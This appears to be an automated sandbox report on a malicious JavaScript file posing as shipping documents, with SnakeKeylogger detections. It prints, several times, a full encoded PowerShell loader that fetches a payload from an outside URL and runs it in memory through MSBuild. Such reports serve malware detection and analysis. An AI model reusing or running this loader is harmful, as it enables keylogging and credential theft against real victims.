F8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$al
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$alJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A972E2810_2_00007FF88A972E28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_026BC53012_2_026BC530
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_026B2DD112_2_026B2DD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_026B948012_2_026B9480
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_026B19B812_2_026B19B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_026BC52112_2_026BC521
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_026B946F12_2_026B946F
                      Source: Shipping Documents SI 694_pdf.jsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3066
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3066Jump to behavior
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@6/3@7/5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vi3ritig.bym.ps1Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002916000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002923000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2511131331.000000000382D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Shipping Documents SI 694_pdf.jsReversingLabs: Detection: 13%
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$al
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUA